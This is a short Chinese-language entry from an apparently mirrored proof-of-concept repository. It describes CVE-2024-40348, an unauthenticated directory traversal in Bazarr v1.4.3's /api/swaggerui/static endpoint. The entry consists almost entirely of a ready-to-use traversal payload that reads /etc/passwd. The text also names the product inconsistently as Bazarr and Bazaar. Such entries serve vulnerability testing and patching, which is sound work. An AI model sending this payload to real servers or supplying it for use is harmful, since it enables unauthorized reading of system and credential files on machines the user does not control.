mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 22:44:52 +08:00
428 B
428 B
Bazarr任意文件读取(CVE-2024-40348)
Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。
poc
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd